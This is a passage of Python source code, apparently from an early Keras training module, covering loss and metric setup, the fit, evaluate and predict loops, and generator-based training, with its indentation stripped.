for mode, name in zip(sample_weight_mode, self.output_names):
if mode == 'temporal':
weight = K.placeholder(ndim=2, name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1, name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
else:
if sample_weight_mode == 'temporal':
sample_weights = [K.placeholder(ndim=2, name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = ['temporal' for name in self.output_names]
else:
sample_weights = [K.placeholder(ndim=1, name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = [None for name in self.output_names]
self.sample_weight_modes = sample_weight_modes
# prepare targets of model
self.targets = []
for i in range(len(self.outputs)):
shape = self.internal_output_shapes[i]
name = self.output_names[i]
self.targets.append(K.placeholder(ndim=len(shape), name=name + '_target'))
# prepare metrics
self.metrics = metrics
self.metrics_names = ['loss']
self.metrics_tensors = []
# compute total loss
total_loss = None
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
weighted_loss = weighted_losses[i]
sample_weight = sample_weights[i]
mask = masks[i]
loss_weight = loss_weights_list[i]
output_loss = weighted_loss(y_true, y_pred,
sample_weight, mask)
if len(self.outputs) > 1:
self.metrics_tensors.append(output_loss)
self.metrics_names.append(self.output_names[i] + '_loss')
if total_loss is None:
total_loss = loss_weight * output_loss
else:
total_loss += loss_weight * output_loss
# add regularization penalties to the loss
for r in self.regularizers:
total_loss = r(total_loss)
# list of same size as output_names.
# contains tuples (metrics for output, names of metrics)
nested_metrics = collect_metrics(metrics, self.output_names)
def append_metric(layer_num, metric_name, metric_tensor):
"""Helper function, used in loop below"""
if len(self.output_names) > 1:
metric_name = self.output_layers[layer_num].name + '_' + metric_name
self.metrics_names.append(metric_name)
self.metrics_tensors.append(metric_tensor)
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
output_metrics = nested_metrics[i]
for metric in output_metrics:
if metric == 'accuracy' or metric == 'acc':
# custom handling of accuracy (because of class mode duality)
output_shape = self.internal_output_shapes[i]
acc_fn = None
if output_shape[-1] == 1 or self.loss_functions[i] == objectives.binary_crossentropy:
# case: binary accuracy
acc_fn = metrics_module.binary_accuracy
elif self.loss_functions[i] == objectives.sparse_categorical_crossentropy:
# case: categorical accuracy with sparse targets
acc_fn = metrics_module.sparse_categorical_accuracy
else:
acc_fn = metrics_module.categorical_accuracy
append_metric(i, 'acc', acc_fn(y_true, y_pred))
else:
metric_fn = metrics_module.get(metric)
metric_result = metric_fn(y_true, y_pred)
if not isinstance(metric_result, dict):
metric_result = {
metric_fn.__name__: metric_result
}
for name, tensor in six.iteritems(metric_result):
append_metric(i, name, tensor)
# prepare gradient updates and state updates
self.optimizer = optimizers.get(optimizer)
self.total_loss = total_loss
self.sample_weights = sample_weights
# functions for train, test and predict will
# be compiled lazily when required.
# This saves time when the user is not using all functions.
self._function_kwargs = kwargs
self.train_function = None
self.test_function = None
self.predict_function = None
self._collected_trainable_weights = collect_trainable_weights(self)
def _make_train_function(self):
if not hasattr(self, 'train_function'):
raise Exception('You must compile your model before using it.')
if self.train_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
training_updates = self.optimizer.get_updates(self._collected_trainable_weights,
self.constraints,
self.total_loss)
updates = self.updates + training_updates
# returns loss and metrics. Updates weights at each call.
self.train_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=updates,
**self._function_kwargs)
def _make_test_function(self):
if not hasattr(self, 'test_function'):
raise Exception('You must compile your model before using it.')
if self.test_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
# return loss and metrics, no gradient updates.
# Does update the network states.
self.test_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=self.state_updates,
**self._function_kwargs)
def _make_predict_function(self):
if not hasattr(self, 'predict_function'):
self.predict_function = None
if self.predict_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + [K.learning_phase()]
else:
inputs = self.inputs
# returns network outputs. Does not update weights.
# Does update the network states.
kwargs = getattr(self, '_function_kwargs', {})
self.predict_function = K.function(inputs,
self.outputs,
updates=self.state_updates,
**kwargs)
def _fit_loop(self, f, ins, out_labels=[], batch_size=32,
nb_epoch=100, verbose=1, callbacks=[],
val_f=None, val_ins=None, shuffle=True,
callback_metrics=[]):
'''Abstract fit function for f(ins).
Assume that f returns a list, labeled by out_labels.
# Arguments
f: Keras function returning a list of tensors
ins: list of tensors to be fed to `f`
out_labels: list of strings, display names of
the outputs of `f`
batch_size: integer batch size
nb_epoch: number of times to iterate over the data
verbose: verbosity mode, 0, 1 or 2
callbacks: list of callbacks to be called during training
val_f: Keras function to call for validation
val_ins: list of tensors to be fed to `val_f`
shuffle: whether to shuffle the data at the beginning of each epoch
callback_metrics: list of strings, the display names of the metrics
passed to the callbacks. They should be the
concatenation of the display names of the outputs of
`f` and the display names of the outputs of `f_val`.
# Returns
`History` object.
'''
do_validation = False
if val_f and val_ins:
do_validation = True
if verbose:
print('Train on %d samples, validate on %d samples' %
(ins[0].shape[0], val_ins[0].shape[0]))
nb_train_sample = ins[0].shape[0]
index_array = np.arange(nb_train_sample)
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self
# (used by Sequential models)
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks._set_model(callback_model)
callbacks._set_params({
'batch_size': batch_size,
'nb_epoch': nb_epoch,
'nb_sample': nb_train_sample,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
callback_model.stop_training = False
self.validation_data = val_ins
for epoch in range(nb_epoch):
callbacks.on_epoch_begin(epoch)
if shuffle == 'batch':
index_array = batch_shuffle(index_array, batch_size)
elif shuffle:
np.random.shuffle(index_array)
batches = make_batches(nb_train_sample, batch_size)
epoch_logs = {}
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
try:
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
except TypeError:
raise Exception('TypeError while preparing batch. '
'If using HDF5 input data, '
'pass shuffle="batch".')
batch_logs = {}
batch_logs['batch'] = batch_index
batch_logs['size'] = len(batch_ids)
callbacks.on_batch_begin(batch_index, batch_logs)
outs = f(ins_batch)
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
if batch_index == len(batches) - 1: # last batch
# validation
if do_validation:
# replace with self._evaluate
val_outs = self._test_loop(val_f, val_ins,
batch_size=batch_size,
verbose=0)
if type(val_outs) != list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
if callback_model.stop_training:
break
callbacks.on_train_end()
return self.history
def _predict_loop(self, f, ins, batch_size=32, verbose=0):
'''Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
'''
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) != list:
batch_outs = [batch_outs]
if batch_index == 0:
for batch_out in batch_outs:
shape = (nb_sample,) + batch_out.shape[1:]
outs.append(np.zeros(shape, dtype=K.floatx()))
for i, batch_out in enumerate(batch_outs):
outs[i][batch_start:batch_end] = batch_out
if verbose == 1:
progbar.update(batch_end)
if len(outs) == 1:
return outs[0]
return outs
def _test_loop(self, f, ins, batch_size=32, verbose=0):
'''Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) == list:
if batch_index == 0:
for _ in batch_outs:
outs.append(0.)
for i, batch_out in enumerate(batch_outs):
outs[i] += batch_out * len(batch_ids)
else:
if batch_index == 0:
outs.append(0.)
outs[0] += batch_outs * len(batch_ids)
if verbose == 1:
progbar.update(batch_end)
for i, out in enumerate(outs):
outs[i] /= nb_sample
if len(outs) == 1:
return outs[0]
return outs
def _standardize_user_data(self, x, y,
sample_weight=None, class_weight=None,
check_batch_dim=True, batch_size=None):
if not hasattr(self, 'optimizer'):
raise Exception('You must compile a model before training/testing.'
' Use `model.compile(optimizer, loss)`.')
output_shapes = []
for output_shape, loss_fn in zip(self.internal_output_shapes, self.loss_functions):
if loss_fn.__name__ == 'sparse_categorical_crossentropy':
output_shapes.append(output_shape[:-1] + (1,))
elif getattr(objectives, loss_fn.__name__, None) is None:
output_shapes.append(None)
else:
output_shapes.append(output_shape)
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_dim=False,
exception_prefix='model input')
y = standardize_input_data(y, self.output_names,
output_shapes,
check_batch_dim=False,
exception_prefix='model target')
sample_weights = standardize_sample_weights(sample_weight,
self.output_names)
class_weights = standardize_class_weights(class_weight,
self.output_names)
sample_weights = [standardize_weights(ref, sw, cw, mode)
for (ref, sw, cw, mode)
in zip(y, sample_weights, class_weights, self.sample_weight_modes)]
check_array_lengths(x, y, sample_weights)
check_loss_and_target_compatibility(y, self.loss_functions, self.internal_output_shapes)
if self.stateful and batch_size:
if x[0].shape[0] % batch_size != 0:
raise Exception('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples')
return x, y, sample_weights
def fit(self, x, y, batch_size=32, nb_epoch=10, verbose=1, callbacks=[],
validation_split=0., validation_data=None, shuffle=True,
class_weight=None, sample_weight=None):
'''Trains the model for a fixed number of epochs (iterations on a dataset).
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
nb_epoch: integer, the number of times to iterate over the training data arrays.
verbose: 0, 1, or 2. Verbosity mode. 0 = silent, 1 = verbose, 2 = one log line per epoch.
callbacks: list of callbacks to be called during training.
See [callbacks](/callbacks).
validation_split: float between 0 and 1:
fraction of the training data to be used as validation data.
The model will set apart this fraction of the training data,
will not train on it, and will evaluate the loss and any model metrics
on this data at the end of each epoch.
validation_data: data on which to evaluate the loss and any model metrics
at the end of each epoch. The model will not be trained on this data.
This can be a tuple (val_x, val_y) or a tuple (val_x, val_y, val_sample_weights).
shuffle: boolean, whether to shuffle the training data before each epoch.
class_weight: optional dictionary mapping class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
# Returns
A `History` instance. Its `history` attribute contains
all information collected during training.
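# Example
A minimal usage sketch; `model` is assumed to be already compiled and
`x_train`/`y_train` to be Numpy arrays (names are illustrative only):
```python
history = model.fit(x_train, y_train,
                    batch_size=32, nb_epoch=10,
                    validation_split=0.1)
print(history.history['loss'])
```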
'''
# validate user data
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_dim=False,
batch_size=batch_size)
# prepare validation data
if validation_data:
do_validation = True
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise Exception('validation_data should be a tuple '
'(val_x, val_y) or (val_x, val_y, val_sample_weights). '
'Found: ' + str(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y,
sample_weight=val_sample_weight,
check_batch_dim=False,
batch_size=batch_size)
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
elif validation_split and 0. < validation_split < 1.:
do_validation = True
split_at = int(len(x[0]) * (1. - validation_split))
x, val_x = (slice_X(x, 0, split_at), slice_X(x, split_at))
y, val_y = (slice_X(y, 0, split_at), slice_X(y, split_at))
sample_weights, val_sample_weights = (
slice_X(sample_weights, 0, split_at), slice_X(sample_weights, split_at))
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
else:
do_validation = False
val_f = None
val_ins = None
# prepare input arrays and training function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
f = self.train_function
# prepare display labels
out_labels = self.metrics_names
# rename duplicated metrics name
# (can happen with an output layer shared among multiple dataflows)
deduped_out_labels = []
for i, label in enumerate(out_labels):
new_label = label
if out_labels.count(label) > 1:
dup_idx = out_labels[:i].count(label)
new_label += '_' + str(dup_idx + 1)
deduped_out_labels.append(new_label)
out_labels = deduped_out_labels
if do_validation:
callback_metrics = copy.copy(out_labels) + ['val_' + n for n in out_labels]
else:
callback_metrics = copy.copy(out_labels)
# delegate logic to _fit_loop
return self._fit_loop(f, ins, out_labels=out_labels,
batch_size=batch_size, nb_epoch=nb_epoch,
verbose=verbose, callbacks=callbacks,
val_f=val_f, val_ins=val_ins, shuffle=shuffle,
callback_metrics=callback_metrics)
def evaluate(self, x, y, batch_size=32, verbose=1, sample_weight=None):
'''Returns the loss value and metrics values for the model
in test mode. Computation is done in batches.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per evaluation batch.
verbose: verbosity mode, 0 or 1.
sample_weight: optional array of weights to apply to the model's loss for each sample.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
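# Example
A sketch assuming `model` was compiled with `metrics=['accuracy']` and
`x_test`/`y_test` are Numpy arrays (names are illustrative only):
```python
scores = model.evaluate(x_test, y_test, batch_size=64, verbose=0)
print(dict(zip(model.metrics_names, scores)))
```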
'''
# validate user data
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
check_batch_dim=False,
batch_size=batch_size)
# prepare inputs, delegate logic to _test_loop
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
f = self.test_function
return self._test_loop(f, ins,
batch_size=batch_size,
verbose=verbose)
def predict(self, x, batch_size=32, verbose=0):
'''Generates output predictions for the input samples,
processing the samples in a batched way.
# Arguments
x: the input data, as a Numpy array
(or list of Numpy arrays if the model has multiple inputs).
batch_size: integer.
verbose: verbosity mode, 0 or 1.
# Returns
A Numpy array of predictions.
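# Example
A sketch for a single-output model; `model` and the Numpy array `x_new`
are assumed to exist (names are illustrative only):
```python
predictions = model.predict(x_new, batch_size=128)
print(predictions.shape)
```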
'''
# validate user data
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_dim=False)
if self.stateful:
if x[0].shape[0] > batch_size and x[0].shape[0] % batch_size != 0:
raise Exception('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples. '
'Batch size: ' + str(batch_size) + '.')
# prepare inputs, delegate logic to _predict_loop
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + [0.]
else:
ins = x
self._make_predict_function()
f = self.predict_function
return self._predict_loop(f, ins,
batch_size=batch_size, verbose=verbose)
def train_on_batch(self, x, y,
sample_weight=None, class_weight=None):
'''Runs a single gradient update on a single batch of data.
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
class_weight: optional dictionary mapping class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
# Returns
Scalar training loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
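# Example
A sketch of a manual training loop; `batch_generator()` is a hypothetical
iterator of (x_batch, y_batch) Numpy pairs:
```python
for x_batch, y_batch in batch_generator():
    loss = model.train_on_batch(x_batch, y_batch)
```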
'''
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_dim=True)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
outputs = self.train_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def test_on_batch(self, x, y, sample_weight=None):
'''Test the model on a single batch of samples.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
check_batch_dim=True)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
outputs = self.test_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def predict_on_batch(self, x):
'''Returns predictions for a single batch of samples.
'''
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + [0.]
else:
ins = x
self._make_predict_function()
outputs = self.predict_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def fit_generator(self, generator, samples_per_epoch, nb_epoch,
verbose=1, callbacks=[],
validation_data=None, nb_val_samples=None,
class_weight={}, max_q_size=10, nb_worker=1, pickle_safe=False):
'''Fits the model on data generated batch-by-batch by
a Python generator.
The generator is run in parallel to the model, for efficiency.
For instance, this allows you to do real-time data augmentation
on images on CPU in parallel to training your model on GPU.
# Arguments
generator: a generator.
The output of the generator must be either
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
All arrays should contain the same number of samples.
The generator is expected to loop over its data
indefinitely. An epoch finishes when `samples_per_epoch`
samples have been seen by the model.
samples_per_epoch: integer, number of samples to process before
going to the next epoch.
nb_epoch: integer, total number of iterations on the data.
verbose: verbosity mode, 0, 1, or 2.
callbacks: list of callbacks to be called during training.
validation_data: this can be either
- a generator for the validation data
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
nb_val_samples: only relevant if `validation_data` is a generator.
number of samples to use from validation generator
at the end of every epoch.
class_weight: dictionary mapping class indices to a weight
for the class.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up when using process based threading
pickle_safe: if True, use process based threading. Note that because
this implementation relies on multiprocessing, you should not pass
non picklable arguments to the generator as they can't be passed
easily to children processes.
# Returns
A `History` object.
# Example
```python
def generate_arrays_from_file(path):
while 1:
f = open(path)
for line in f:
# create numpy arrays of input data
# and labels, from each line in the file
x1, x2, y = process_line(line)
yield ({'input_1': x1, 'input_2': x2}, {'output': y})
f.close()
model.fit_generator(generate_arrays_from_file('/my_file.txt'),
samples_per_epoch=10000, nb_epoch=10)
```
'''
wait_time = 0.01 # in seconds
epoch = 0
do_validation = bool(validation_data)
self._make_train_function()
if do_validation:
self._make_test_function()
# python 2 has 'next', 3 has '__next__'
# avoid any explicit version checks
val_gen = (hasattr(validation_data, 'next') or
hasattr(validation_data, '__next__'))
if val_gen and not nb_val_samples:
raise Exception('When using a generator for validation data, '
'you must specify a value for "nb_val_samples".')
out_labels = self.metrics_names
callback_metrics = out_labels + ['val_' + n for n in out_labels]
# prepare callbacks
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self:
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks._set_model(callback_model)
callbacks._set_params({
'nb_epoch': nb_epoch,
'nb_sample': samples_per_epoch,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
if do_validation and not val_gen:
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise Exception('validation_data should be a tuple '
'(val_x, val_y, val_sample_weight) '
'or (val_x, val_y). Found: ' + str(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y, val_sample_weight)
self.validation_data = val_x + [val_y, val_sample_weights]
else:
self.validation_data = None
# start generator thread storing batches into a queue
data_gen_queue, _stop, generator_threads = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
callback_model.stop_training = False
while epoch < nb_epoch:
callbacks.on_epoch_begin(epoch)
samples_seen = 0
batch_index = 0
while samples_seen < samples_per_epoch:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
# build batch logs
batch_logs = {}
if type(x) is list:
batch_size = x[0].shape[0]
elif type(x) is dict:
batch_size = list(x.values())[0].shape[0]
else:
batch_size = x.shape[0]
batch_logs['batch'] = batch_index
batch_logs['size'] = batch_size
callbacks.on_batch_begin(batch_index, batch_logs)
try:
outs = self.train_on_batch(x, y,
sample_weight=sample_weight,
class_weight=class_weight)
except:
_stop.set()
raise
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
# construct epoch logs
epoch_logs = {}
batch_index += 1
samples_seen += batch_size
# epoch finished
if samples_seen > samples_per_epoch:
warnings.warn('Epoch comprised more than '
'`samples_per_epoch` samples, '
'which might affect learning results. '
'Set `samples_per_epoch` correctly '
'to avoid this warning.')
if samples_seen >= samples_per_epoch and do_validation:
if val_gen:
val_outs = self.evaluate_generator(validation_data,
nb_val_samples,
max_q_size=max_q_size,
nb_worker=nb_worker,
pickle_safe=pickle_safe)
else:
# no need for try/except because
# data has already been validated
val_outs = self.evaluate(val_x, val_y,
batch_size=batch_size,
sample_weight=val_sample_weights,
verbose=0)
if type(val_outs) is not list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
epoch += 1
if callback_model.stop_training:
break
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
data_gen_queue.close()
callbacks.on_train_end()
return self.history
def evaluate_generator(self, generator, val_samples, max_q_size=10, nb_worker=1, pickle_safe=False):
'''Evaluates the model on a data generator. The generator should
return the same kind of data as accepted by `test_on_batch`.
# Arguments
generator: generator yielding tuples (inputs, targets)
or (inputs, targets, sample_weights)
val_samples: total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up when using process based threading
pickle_safe: if True, use process based threading. Note that because
this implementation relies on multiprocessing, you should not pass
non picklable arguments to the generator as they can't be passed
easily to children processes.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
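# Example
A sketch; `val_generator` is a hypothetical generator yielding
(inputs, targets) batches:
```python
val_metrics = model.evaluate_generator(val_generator, val_samples=3200,
                                        max_q_size=10)
```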
'''
self._make_test_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
weights = []
data_gen_queue, _stop, generator_threads = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
while processed_samples < val_samples:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
try:
outs = self.test_on_batch(x, y, sample_weight=sample_weight)
except:
_stop.set()
raise
if type(x) is list:
nb_samples = len(x[0])
elif type(x) is dict:
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
all_outs.append(outs)
processed_samples += nb_samples
weights.append(nb_samples)
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
data_gen_queue.close()
if type(outs) is not list:
return np.average(np.asarray(all_outs),
weights=weights)
else:
averages = []
for i in range(len(outs)):
averages.append(np.average([out[i] for out in all_outs],
weights=weights))
return averages
def predict_generator(self, generator, val_samples, max_q_size=10, nb_worker=1, pickle_safe=False):
'''Generates predictions for the input samples from a data generator.
The generator should return the same kind of data as accepted by
`predict_on_batch`.
# Arguments
generator: generator yielding batches of input samples.
val_samples: total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up when using process based threading
pickle_safe: if True, use process based threading. Note that because
this implementation relies on multiprocessing, you should not pass
non picklable arguments to the generator as they can't be passed
easily to children processes.
# Returns
Numpy array(s) of predictions.
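# Example
A sketch; `image_generator` is a hypothetical generator yielding batches
of input samples only:
```python
preds = model.predict_generator(image_generator, val_samples=1000,
                                max_q_size=10)
```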
'''
self._make_predict_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
data_gen_queue, _stop, generator_threads = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
while processed_samples < val_samples:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if isinstance(generator_output, tuple):
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
else:
x = generator_output
try:
outs = self.predict_on_batch(x)
except:
_stop.set()
raise
if type(x) is list:
nb_samples = len(x[0])
elif type(x) is dict:
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
if type(outs) != list:
outs = [outs]
if len(all_outs) == 0:
for out in outs:
shape = (val_samples,) + out.shape[1:]
